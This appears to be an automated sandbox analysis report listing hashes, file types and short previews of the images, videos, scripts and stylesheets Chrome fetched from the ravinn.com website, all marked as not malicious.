                                                Encrypted:false
                                                SSDEEP:
                                                MD5:FFCC98131ED7EC53A794EE6CB325B01F
                                                SHA1:3384D37F2008402C1E3E501D16337E9414F64E85
                                                SHA-256:A11DCE664E8DEF29241D052F4F05F2F0481ED6B938F53E37E4973A06743CA11A
                                                SHA-512:BC36B3445CC8CC277A323B5B6250C3388E78D64583DDE273358F6A2E6E65C21BA938C2EABD89F5A40161B02C6C05151554C36906FC759C6AC9DA72F39E6F96E6
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://www.ravinn.com/wp-content/uploads/2023/11/australia.svg
                                                Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg xmlns="http://www.w3.org/2000/svg" width="60" height="59" viewBox="0 0 60 59" fill="none">. <path d="M52.7699 54.0621C52.8641 53.5387 52.8377 53.0008 52.6929 52.4891C52.548 51.9774 52.2884 51.5055 51.9339 51.1091C51.6821 50.87 51.3749 50.697 51.0398 50.6057C50.7047 50.5145 50.3523 50.5077 50.0139 50.5861C49.2879 50.695 48.5462 50.6225 47.8549 50.3751C47.4959 50.2811 47.0899 50.1751 46.6419 50.0941C46.2257 49.9837 45.7877 49.9863 45.3728 50.1016C44.958 50.2169 44.5814 50.4408 44.2819 50.7501C44.0138 51.0689 43.8354 51.4533 43.7651 51.8639C43.6948 52.2744 43.7351 52.6963 43.8819 53.0861C44.4142 54.4935 45.15 55.8153 46.0659 57.0091L46.2319 57.2491C46.5594 57.7298 46.9984 58.1239 47.5115 58.3979C48.0245 58.6718 48.5963 58.8174 49.1779 58.8221C49.3849 58.8223 49.5914 58.8035 49.7949 58.7661C50.4376 58.6476 51.0307 58.341 51.4989 57.8851C51.9671 57.4291 52.2894 56.8444 52.4249 56.2051C52.4967 55.8681 52.5075 55.5209 52.4569 55.1801C52.4489 55.105
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=11, manufacturer=NIKON CORPORATION, model=NIKON Z 8, orientation=upper-left, xresolution=174, yresolution=182, resolutionunit=2, software=Adobe Photoshop Lightroom Classic 13.1 (Macintosh), datetime=2023:12:18 10:18:06], comment: "Optimized by JPEGmini 3.18.17.230722883-YEV 0xb704c694", baseline, precision 8, 2048x1365, components 3
                                                Category:dropped
                                                Size (bytes):227778
                                                Entropy (8bit):7.918665813097511
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:F61A6B67903D61AE73C98B5F456F4A17
                                                SHA1:BF2A3D696E2128FE5E0385B31952A8C15774F3AD
                                                SHA-256:28C92479B3DF05473464981375EB76DF53B7BABA001B53A1B44C3AB2D0FCFBD2
                                                SHA-512:5DB2784009591A3B3F5161EADA32C0964B02060BB118EF534DC97B89090CCCA8C78BB5894DDD91ED8744A4AEAB7155655D6A9B9CADA2BDC835E516C8A6BB34FA
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:......JFIF.....`.`....1.Exif..MM.*...................................................................(...........1.....3.....2...........;.......................i........."....NIKON CORPORATION.NIKON Z 8.................Adobe Photoshop Lightroom Classic 13.1 (Macintosh)..2023:12:18 10:18:06.GABRIEL VEIT..GABRIEL VEIT...+...........,...........4."...........'...........0...........2..................0231...........<...........P...........d...........l...........t...........|................................................................................89..........89...............................................................................................................................................:........................................................................... ...........1...........2..........4..............................2023:12:14 10:54:14.2023:12:14 10:54:14.+10:00..+10:00..+10:00...t....B@."....B@...........D.....~.......~..............8784040263..7401630...
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:data
                                                Category:downloaded
                                                Size (bytes):1048576
                                                Entropy (8bit):7.9996566787320695
                                                Encrypted:true
                                                SSDEEP:
                                                MD5:D01462BD2513D36EE804DC52D1A30D65
                                                SHA1:B388F19BD98EA59F5E9505DBB4E5D13BB65BE489
                                                SHA-256:AAF1290FCFEA52A85857AB998962C047B5AF9A8A22CF479A5DDDB0DD16C1771E
                                                SHA-512:ACB0F59A75AB6AFA854F73B443CBEA4AE0F3480F55F508CAC70ADF79F4CB8F77B3C93E58C6B36ECB29EECBC14F8D5A3F0BB87EBF460FE1AAD0B390A831476FD6
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://www.ravinn.com/wp-content/uploads/2023/11/Ravinn-desktop-1600x800-1.mp4:2f905610c59538:3
                                                Preview:e]Y|T......f.X.*....x..56;..........E.-.$C...[tn..4..9.+f.......D...M|.F4..{.._H.%.i....r.t....(....^u.2.LF.:7..SX..<..b:...Cu.r......W.y8..M....2..0v=..dcd..Cg38....[..Q.J...7y./.....Dg.....y.........Gi........7.E..B..;...l#M.....^l.X5.C.....98A.,..n.._......i(%.#".~o.{....&`........Xg.x...... ...u.g(^*..g#.....`,6....$o.....N.S..<......*..*.....}-..n...B..[.I..Q~@B..9....-.N.9K.....Ix....`k.v.+wo...,....._cy.n..f,...[y.k.A.VlcEn....C.....USZ..M...h...-YJ....0rK.(.&......k..h..+.\/@.X...l..A..dFn.sC......e.A..b_t..P...~....-:.?...V.\.....dK...(..F(..y=..]f...L..62.%.w...5-..1.+.:.qy......^D.s4...D...... ...$].z.gp.g..|y....t^...........ZwD..vX..y.N...h.rEK+..Ae6.3...?.-.4.....5i..y7.8y.8......<~.V8..L..... ...\......._]:..0..2_.FLi4c.[lI...........H...3B(...C>6.-g.\q...6U.._RGWdS..).V.u......._....;D...._.......&..-k.AO i.J.&EX.7..".9.S?..DfLj%.4.^`...k...X0.;...{......q.N......(S.}..<.Qf.>.....)q.=....|......)uC...#....s=c....&_..t
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 214 x 59, 8-bit/color RGBA, non-interlaced
                                                Category:downloaded
                                                Size (bytes):2881
                                                Entropy (8bit):7.896608066849846
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:CEA88A4FB5FBF2EFBDBE563548799B85
                                                SHA1:B2F7115CBD92BBA0EA78F992E0B527BA0AB8C156
                                                SHA-256:FFF56ED2445411DBE5FA04B6FCABB7FF27C63DB4BC4238A0D01F7D79DAF04E17
                                                SHA-512:B0FD819B97EC240269154455A6C7DBB9B15F4EDBB726D25B496D8E26051D53F19F98124BB5C87E06DC484E6E2F8A79579E050F2ACA6AD7133172626CA2F1B650
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://www.ravinn.com/wp-content/uploads/2024/01/logo.png
                                                Preview:.PNG........IHDR.......;......9tr....IDATx...pU...o...5PA..U:-..P .."...h0E.a..P.qj%.#.0..p..fJ]..2.....(ZF...........Di......KN...].......7I...7...{../18..KnI...|.......-.N.P.68.NX..%..5....x.t18.[".%...S .f..7..+c..t.....6.......@.F..*'.=S.J..T.ru78.X.$......*.B...\.%....1N.....+.<.@YP(.\.%....py.y.......N.b.8q.U*K.rK.;..U...*.../...J*.....&.=+.sO..T....2.....8.^.k.Y..!x]...@.tp.J.{.m..=1..G..H+.g..e...DS I3p..-...G'W...UR...._.F..N4......U....&zZ...87^...v...@..MA.0|............s]*.4-Xf+._0..D F+.._.~.1...M..T..I.....a.h.R.........\.7..,V..l.R.38.X.........7<.Z.......X*N|.b...\....j.>.Rq.;...T..Iu..18.XO..J_.......N..b...~.....$...Rqn.@..p..$.L eu..T. ..p.5...u.n..28.x.....x+g....ob.8..rM.!..`~.1..a.8..r].J.B.I..s...T.\/.O.......V.........+.B.b.fp8....Rq8.....>,....p...T..38.....p8....?yhDV.A+......AF....w..._x85...j.@.........#Y3.:i..)u=4u.4....w.c.E..".....q.V$.............8O....`=....f.|A.-..G../A"........k.1.D.V....b.").2b...d.v.Q..{Z3w.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 4096 x 1115, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):236783
                                                Entropy (8bit):7.408148130108511
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:DC4BCA2009B0482AF8E3F1454E9372FC
                                                SHA1:CADDA0E2B466DA71F9855C617D10F7283F2BB84A
                                                SHA-256:3977169853FC91F51AB23033568B1D160B8886BF59F448A7874FA6D23B7AC17C
                                                SHA-512:6E221ADA2731620F4B89312134BB16F97C96176A6F8B99E0EC69F62742CF8DC7124CC21C6C66BA2BBE2679D9D2589E9380F2F74CC36F0A39672B101BFC03A7F2
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:.PNG........IHDR.......[......{d.....sRGB....... .IDATx^..[.U}&.g.{.}..n..F.. ..4M... .H.A%.c0..5...q3=8..\d....HM..f&.Lf.D...Q+.).!U...J..i.......).%....~.....z~.............. @......Z./..<.?V....@R6...R.LR..5_N2.qs_.....}............ @....... @....... @....... @....... @....... @......[..... @......L...C.|...9;u|Kj.=).?.y..&w...l...Nl6.#@....... @....... @....... @....... @....... @....... 0.....tp.M....... @.y..FM.93.xS.^.....x.k..K.....?.m.9...$..... @....... @....... @....... @....... @....... @.....%......... @....]...&../J..ruj.....oR......a~.....F....... @....... @....... @....... @....... @....... @..O.(.p%.. @......tY...3...M)..H.$.........w..U_..Z.N....... @....... @....... @....... @....... @....... @....P..*. @.............o........3..Y.....-.......\.R... @....... @....... @....... @....... @....... @.....z+............. @....|hGj..$...K.bQ............oQ.... @....... @....... @....... @....... @....... @....=.P....K....... .A.Qm....woH..V.-
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:SVG Scalable Vector Graphics image
                                                Category:dropped
                                                Size (bytes):767
                                                Entropy (8bit):4.466006228913099
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:F658FFECC6CD465DFEB42E24F3E6A074
                                                SHA1:1183740E2650A20353F3074B7B3E7993C2BC46E8
                                                SHA-256:F4BDFEDBC737FC92FF2566CFB055029DDB48A44350BD8765EBDF3831BDC39BAD
                                                SHA-512:97DAB72FA467AA47984E312A5B65F67660EED6E198D3F87EA9C220ECB1864C6AFCAD9A64676033EF4F4437B230B8DE18A55F45A35434F4CB949B2F175F80A079
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg xmlns="http://www.w3.org/2000/svg" width="31" height="32" viewBox="0 0 31 32" fill="none">. <path d="M14.4375 0.5C15.4375 0.125 16.5625 0.125 17.5625 0.5L28.5625 5.1875C29.9375 5.8125 31 7.125 31 8.75C30.9375 15 28.375 26.3125 17.625 31.5C16.5625 32 15.375 32 14.3125 31.5C3.5625 26.3125 1 15 0.9375 8.75C0.9375 7.125 2 5.8125 3.375 5.1875L14.4375 0.5ZM2.9375 8.75C3 10 3.0625 11.5 3.375 13H14.9375V2.4375L4.125 7.0625C3.4375 7.3125 2.9375 8 2.9375 8.75ZM3.8125 15C5.125 20.3125 8.3125 26.3125 14.9375 29.5625V15H3.8125ZM16.9375 15V29.5625C23.625 26.3125 26.8125 20.3125 28.125 15H16.9375ZM28.5625 13C28.875 11.5 28.9375 10 29 8.75C29 8 28.5 7.3125 27.8125 7.0625L16.9375 2.4375V13H28.5625Z" fill="#181249"></path>.</svg>.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:data
                                                Category:downloaded
                                                Size (bytes):1048576
                                                Entropy (8bit):7.999620648885794
                                                Encrypted:true
                                                SSDEEP:
                                                MD5:257A67B67764593E46DDD48F2876C427
                                                SHA1:F37F022953322D3CD84EDCF3C8FC67D539D6A4D7
                                                SHA-256:91F0CCF8FC38B4ED53BDC78F36637AD86ED21758BAD899E8F9A38E84237F2EF7
                                                SHA-512:B2450495AF0F9B21318C5A59DBCDADA75BDD86F83048CD480D9EFFD6489F356C008BDE932B6F29FF09F7272BC209032608C889E789EF6329FCC7D5B8926ABB0F
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://www.ravinn.com/wp-content/uploads/2023/11/Ravinn-desktop-1600x800-1.mp4:2f905610c59538:2
                                                Preview:Q.......e.T...5.......^...,y.....6].......p.......7..T....#oP.....^.......o...,v........<.\.0......iw..5p.4...O+.'...l<e(..v(..0.R!.]y..Z<../....z)k/...^.e...........m+8...n.\.p.K:..b.$.....Eg..k5.......L.....H.U..B.OH:.ru..R&..#..f......]*zC9a9_..".B.u.a.~...Z2..;.s.-d.NK.%....9..4.E...8/6..q.....D>.....D......-.]....Bb...jh.V.....T..m|x.r...iDM=.....).._..vn.......:...7.C.`.m..Q.0q\.......9..q.g...b :.{..W...".7..t#..aH..v..C{U.Z..f.Z....AM..D9....(..~..b.al./.\.}......D.....~....56.Q.tL..e.....Gq....+...'.6|.{c.qmps2..y...{.].....RO.J....WK.\/F4......Gb.Y.P'....L..8).........;.2......uA..N{HM*..2..%u......;...{...CW{..w.7....8.+.}...........^P9n4.g.5..2...F{..i..J.6...~...JL...C...q=..YW........qe.W.......3..*....z.\R'.(.h..m....B!.*..rxS....z.....9T'MG..-.6\.u..Pv.Z.2.....\.j|......A....0.Q.......|...l}....=.c..]..x.J..I.xV....o.YL.`5.L..lhJ.....}..R.[|z.fG..0...X...LL&..fV|.?.R..T.M.^...j...3..).. .!.=..7<qgy.D.C......K<0~.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:Unicode text, UTF-8 text, with very long lines (65535), with no line terminators
                                                Category:downloaded
                                                Size (bytes):66559
                                                Entropy (8bit):5.446576158202529
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:AF7FDDB4CA19D21DFE6C7270393E6E81
                                                SHA1:E81D216FC18E63110DFE2959DC5590CAC2165892
                                                SHA-256:D9CBA6C89EC281974252F3902E707DCD78B39C9439BC7758101FBC52DA0DDD85
                                                SHA-512:A50EC3E8E8556816809034E66E60A5EA6D6BE83600AF14510F10DA8CF0AE5C92879518636149D6F2F8739C123A541DFC3536E72E8A0D99C4B7C207FAF9876A89
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://static.klaviyo.com/onsite/js/sharedUtils.db6638454dfe7d02bbcd.js?cb=1
                                                Preview:"use strict";(self.webpackChunk_klaviyo_onsite_modules=self.webpackChunk_klaviyo_onsite_modules||[]).push([[2462],{45933:function(t,n,e){e.d(n,{e:function(){return u}});e(92461),e(44159),e(83362);const r=["openForm","identify","track","trackViewedItem","account","cookieDomain","isIdentified","cacheEvent","sendCachedEvents","getGroupMembership"],o={openForm:[],cacheEvent:[],sendCachedEvents:[],getGroupMembership:[],createClientSession:[],getClientIdentifiers:[]},i=()=>{},a={openForm:i,identify:i,track:i,trackViewedItem:i,account:i,cookieDomain:i,isIdentified:i,cacheEvent:i,sendCachedEvents:i,getGroupMembership:i,createClientSession:i,getClientIdentifiers:i};const c=new class{constructor(){this.learnq=window._learnq||[],this.openForm=function(...t){o.openForm.push(t)},this.cacheEvent=function(...t){o.cacheEvent.push(t)},this.sendCachedEvents=function(...t){o.sendCachedEvents.push(t)},this.getGroupMembership=function(...t){o.getGroupMembership.push(t)},this.createClientSession=function(..
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (36437), with no line terminators
                                                Category:downloaded
                                                Size (bytes):36437
                                                Entropy (8bit):5.359821034718741
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:0F52F72FF8DCC32A36BF74609BC283A7
                                                SHA1:E9A31535B1A129E40E943CD870CAEFD9ADDB4ABA
                                                SHA-256:7DC2177571564736D7108CAF493335202D8D6F1DCCA32672314C53B515618C1A
                                                SHA-512:266E1784BADF52CA212EF64CFD17AAB27B9F0B40CEC3CD7C1C7F275E0A839BD4F67E1A54D094DF0E1BCB3238ED70EBEF99DFEAC7D7F015A2C52231C57BE1F587
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://static-tracking.klaviyo.com/onsite/js/fender_analytics.611d7935dc9085329d0a.js?cb=1
                                                Preview:(self.webpackChunk_klaviyo_onsite_modules=self.webpackChunk_klaviyo_onsite_modules||[]).push([[377],{23105:function(t,e,i){"use strict";e.Z=({tracking:t})=>{var e;const o=t?"https://static-tracking.klaviyo.com/onsite/js/":"https://static.klaviyo.com/onsite/js/",n=null==(e=window.klaviyoModulesObject)?void 0:e.assetSource;i.p=n?`${o}${n}`:o}},650:function(t,e,i){"use strict";var o=i(23105);i(78991),i(24570),i(26650);class n{constructor(t,e,i,o,n,r,s){this.doc=t,this.nav=e,this.scr=i,this.win=o,this.loc=n,this.top=r,this.parent=s,this.initializeDOM()}initializeDOM(){this.doc=this.doc||document,this.nav=this.nav||navigator,this.scr=this.scr||window.screen,this.win=this.win||window,this.loc=this.loc||this.doc.location,this.top=this.top||window.top,this.parent=this.parent||window.parent}getDocument(){return this.doc}getNavigator(){return this.nav}getScreen(){return this.scr}getWindow(){return this.win}getLocation(){return this.loc}getProtocol(){return["https:","about:"].includes(this.loc.pr
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (13479)
                                                Category:downloaded
                                                Size (bytes):13577
                                                Entropy (8bit):5.272065782731947
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:9FFEB32E2D9EFBF8F70CAABDED242267
                                                SHA1:3AD0C10E501AC2A9BFA18F9CD7E700219B378738
                                                SHA-256:5274F11E6FB32AE0CF2DFB9F8043272865C397A7C4223B4CFA7D50EA52FBDE89
                                                SHA-512:8D6BE545508A1C38278B8AD780C3758AE48A25E4E12EEE443375AA56031D9B356F8C90F22D4F251140FA3F65603AF40523165E33CAE2E2D62FC78EC106E3D731
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://www.ravinn.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1
                                                Preview:/*! jQuery Migrate v3.4.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */."undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){return t(e,window)}):"object"==typeof module&&module.exports?module.exports=t(require("jquery"),window):t(jQuery,window)}(function(s,n){"use strict";function e(e){return 0<=function(e,t){for(var r=/^(\d+)\.(\d+)\.(\d+)/,n=r.exec(e)||[],o=r.exec(t)||[],a=1;a<=3;a++){if(+o[a]<+n[a])return 1;if(+n[a]<+o[a])return-1}return 0}(s.fn.jquery,e)}s.migrateVersion="3.4.1";var t=Object.create(null);s.migrateDisablePatches=function(){for(var e=0;e<arguments.length;e++)t[arguments[e]]=!0},s.migrateEnablePatches=function(){for(var e=0;e<arguments.length;e++)delete t[arguments[e]]},s.migrateIsPatchEnabled=function(e){return!t[e]},n.console&&n.console.log&&(s&&e("3.0.0")&&!e("5.0.0")||n.console.log("JQMIGRATE: jQuery 3.x-4.x REQUIRED"),s.migrateWarnings
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 420 x 120, 8-bit colormap, non-interlaced
                                                Category:dropped
                                                Size (bytes):7971
                                                Entropy (8bit):7.943582372256995
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:04FB21E18C643D2F79B91023C047F5E9
                                                SHA1:AE133DE803E3B5C66D2AAC6410D21D9D68F1055C
                                                SHA-256:39DBC929B6E9839D89E57471C0A23837BF1596FF4A4FF7A2DD9749C2EF20B3EF
                                                SHA-512:B77B5802A25DFEA886D20CFCBD7617279503A2C07C9139323F9AA642A866F08A7789DDB4BD0C17EC02C3F59FCC3BEE2005CC32365BF55C531EBA5C7C9ED74830
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:.PNG........IHDR.......x.......v.....PLTE.......3.sss...MMM............DDD.....mmm...)))......}}}....!.......666jjj............```...........YYY...........................................+......................... ......000..D..n..^..1.}......}...Si........v....... D............u..........:..N....v..k....................cv.B[.?X....,L.Ld...u.......c.......9.........|..a..C..n.......Z.......A.......2..T..@..a..*6;.F...^IDATx........H.v-[kI.&..%.T......t)..H..%.d.&!K..Z...=.h.......e{...K..!.......f./..F)..RJ)..RJ)..RJ)..RJ)..RJ)...J..D..|...g......>..JAy.j%.S...3 %.g@.......F..t. ......F..t. =.>..ek.(!......)!=...n}^B:+y\H.._l...H........J...-.=+!..l..V{.l.w...o..NY6.tpx.a.=...n.j..:..}gVB:]....a.~..*.v|p..;+-.e.>........<QH.O.....?.^.C...f.-"..ive.}...K5.l..+L{..`....<#-..N%.F7...7....hW.f?..i.u..G.Q.ad.&t....#....^..+.buG....d....|.W.c.......J..9.f3.k.....M=..s..T.T*R...RQ...%B6.......:.{z.U8...f..kWE.Lv......8s.T*..D.DG+.)Z..T.7.QP...
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text
                                                Category:downloaded
                                                Size (bytes):41689
                                                Entropy (8bit):5.013266748320315
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:17574E0D56ED3C0131E9D793118BA3C3
                                                SHA1:3146EC5CD68B0CA47B27E277E9F0AFF6014D1E7F
                                                SHA-256:425010EA312865DD0692C6A3B12E5662404BDA59C0AF127844AF187592636CA3
                                                SHA-512:4E6485DE03F44A4055E195A2B6BBA07AAD6B61E7852B7B4904325456DB61341D968EE34FE8D62A5811F7A9385162274F86C752901346BA42C593F0B916530FCA
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://www.ravinn.com/wp-content/themes/ravinn/css/main.css?v=1743482759
                                                Preview:@import url('https://fonts.googleapis.com/css2?family=Outfit:wght@100;200;300;400;500;600;700;800;900&display=swap');..:root {. --primary-color: #181249;. --secondary-color: #61CBC2;. --dark-color: #1B1B1B;. --light-gray: #E6E5EC;. --light-white: #F3F3F6;.. --primary-fonts: 'Outfit', sans-serif;... --section-gaps: 100px;. --section-md-gaps: 160px;.. --h1-font:32px;. --h2-font:24px;. --h3-font:20px;.}...body {.. font-family: var(--primary-fonts);. -webkit-box-sizing: border-box;. box-sizing: border-box;. color: var(--dark-color);. letter-spacing: 0.64px;. font-size: 16px;.}..img {. max-width: 100%;.}.h6, .h6, h5, .h5, h4, .h4, h3, .h3, h2, .h2, h1, .h1{. line-height: 1.3em;.}.h1{. font-size: var(--h1-font).}.h2{. font-size: var(--h2-font);.}.h3{. font-size: var(--h3-font);.}.b, strong{..font-weight:600.}....fs-3 {. font-size: var(--h1-font) !important;.}..fs-4 {. font-size: var(--h2-font) !important;.}...fs-5 {. font-s
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 270 x 100, 8-bit/color RGB, non-interlaced
                                                Category:dropped
                                                Size (bytes):10920
                                                Entropy (8bit):7.969044218379856
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:03C0F5073F4827C38E890A5D85C52270
                                                SHA1:A8D6C7A87A79DAA3AF1437A7B84BFFC29934C55A
                                                SHA-256:6E3CB1D88DCA6460DC8308622F74D336B7A649F03B69F52B8F5CA4DFF67F11EE
                                                SHA-512:1E2D274C5ED643A5A4F772B07B0D66A76275DBE88150A75C28CEEBEBA6BD6712B5E7DCD97B8408DE9A8D90A0EA787B9C86DD43F53FACA8B39DD02819220B58B9
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:.PNG........IHDR.......d.......Iz...?iCCPICC Profile..H..W.XS...[..@h........@J.-.`#$.B.1.T...kAE.l....;bgQ.}........&.t.W.7.7w.....93...j.9"Q...@.0_...O...B'=.$..(@..8.<.3::..2.......i{.^.....Z4x.<..H4.i.<n.....k."q>.D)o6-_$..-1...ER.!.5R.&.e6.,...PR.p....^.<....5T.!v...B.......N.A...5..A,.g.....7.aM.'c..."+J..<Q.g.....]rs$C>,aU....J...v3{J...@.'L...X.......b..).I....<...\e.:.8.a..@.$..W.i. 6.p......x.u!^....S.l.O.U.B...,..?....J}.d'0...3.l.>.Z....1.b..Ab$..;.e.)l..f.".l.Xi.......r}. ]..../..../.1S..T....!..`.\.,~8..._.L...........(.;../L.S.|........QN...7...KyS.]....c..|.!..x.(?:^.'^....../......H`M.S@..t.5..;yO...1..|`.`.F$.z.........A..8.Y/..@..0+..tYo.lD6x.q...9.^".%.....CF....X.0..X.....b.3L.+..G..%1..@.!..mp}........V'..{...=.....p..M.5YP$.)........H.1..%.t..qo...q.\..........]!.R.-...'.....P...(y..l..HU[U.a.i...<..|..{~...!.<..l.-..ag...9.0....1.....H...z,.]C.be.dC..?....4.y....._.}....w4`M....22..L.E...B..(....3......&F..@t:.s..........\.1...
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (8452), with no line terminators
                                                Category:downloaded
                                                Size (bytes):8452
                                                Entropy (8bit):5.738742792293598
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:57CDA4F9B371A1AD34C159EBF350DB3E
                                                SHA1:1D4F5626D5D41DB1B85D4539864C42EAACF7716E
                                                SHA-256:18F2E81EA7665BD130156AB490C5E352BC525D3D3F9F5C1D3108CD14D61C8A03
                                                SHA-512:206369EA0EF9576D19AF58A28DAFEC1D7255CDE34302A1F757DC8E1007543F8BBD6843A0CCE4190F96F525196C3B139EB111A19EFED2EF109BADD97AE87F3353
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://www.ravinn.com/cdn-cgi/challenge-platform/h/b/scripts/jsd/708f7a809116/main.js?
                                                Preview:window._cf_chl_opt={cFPWv:'b'};~function(W,h,i,j,k,o,s,B){W=b,function(d,e,V,f,g){for(V=b,f=d();!![];)try{if(g=-parseInt(V(312))/1*(-parseInt(V(262))/2)+-parseInt(V(349))/3+-parseInt(V(350))/4+-parseInt(V(362))/5+-parseInt(V(308))/6*(-parseInt(V(373))/7)+-parseInt(V(305))/8*(-parseInt(V(325))/9)+-parseInt(V(290))/10,e===g)break;else f.push(f.shift())}catch(E){f.push(f.shift())}}(a,862941),h=this||self,i=h[W(361)],j={},j[W(296)]='o',j[W(273)]='s',j[W(265)]='u',j[W(268)]='z',j[W(313)]='n',j[W(353)]='I',j[W(318)]='b',k=j,h[W(326)]=function(g,E,F,G,a1,I,J,K,L,M,N){if(a1=W,null===E||void 0===E)return G;for(I=n(E),g[a1(342)][a1(322)]&&(I=I[a1(298)](g[a1(342)][a1(322)](E))),I=g[a1(335)][a1(344)]&&g[a1(352)]?g[a1(335)][a1(344)](new g[(a1(352))](I)):function(O,a2,P){for(a2=a1,O[a2(266)](),P=0;P<O[a2(371)];O[P+1]===O[P]?O[a2(285)](P+1,1):P+=1);return O}(I),J='nAsAaAb'.split('A'),J=J[a1(280)][a1(289)](J),K=0;K<I[a1(371)];L=I[K],M=m(g,E,L),J(M)?(N='s'===M&&!g[a1(272)](E[L]),a1(309)===F+L?H(F+L,M):
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text
                                                Category:downloaded
                                                Size (bytes):7479
                                                Entropy (8bit):5.338625389999799
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:6256826B78CD749A03CE52B5FDCB3AC5
                                                SHA1:25C1C4010B6FFE36958D6F12CC9E2358C960C954
                                                SHA-256:A6431F72DE4D374D768215A80B8FC8B03323069D645EC461E44570362D892174
                                                SHA-512:86BF370AC98AECE02F5B8BB85503B373F9D5142F822AA9C8F7E02388797BFC1DFCC97102D4AD5B4AAC7EF13CC8C95C2016A193DE91D403FD268FE6A82BD8564D
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://fonts.googleapis.com/css2?family=Outfit:wght@100;200;300;400;500;600;700;800;900&display=swap
                                                Preview:/* latin-ext */.@font-face {. font-family: 'Outfit';. font-style: normal;. font-weight: 100;. font-display: swap;. src: url(https://fonts.gstatic.com/s/outfit/v11/QGYvz_MVcBeNP4NJuktqQ4E.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'Outfit';. font-style: normal;. font-weight: 100;. font-display: swap;. src: url(https://fonts.gstatic.com/s/outfit/v11/QGYvz_MVcBeNP4NJtEtq.woff2) format('woff2');. unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;.}./* latin-ext */.@font-face {. font-family: 'Outfit';. font-style: normal;. font-weight: 200;. font-display: swap;. src: url(https://fonts.gstatic.com/s/outfit/v11/Q
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (620), with CRLF line terminators
                                                Category:downloaded
                                                Size (bytes):149952
                                                Entropy (8bit):5.0658142503407175
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:144E03990813BC048A51D45683D7F118
                                                SHA1:A71835E28EE6B903CAE2EF92B5AC434A234EF5CF
                                                SHA-256:E6EE8F2D45FB414EA8183FD2D3A63439FEF534E3B9EC5E618EFFFCC75B552F1A
                                                SHA-512:116158722E73D753761721F9D0AC02743545E0113369165F030E83FF45B61A6910E1585B891E3C9323B44FB992842E4B06745B3496CCA0F39270511B285046F3
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://www.ravinn.com/wp-content/themes/ravinn/js/bootstrap.js?v=1743482759
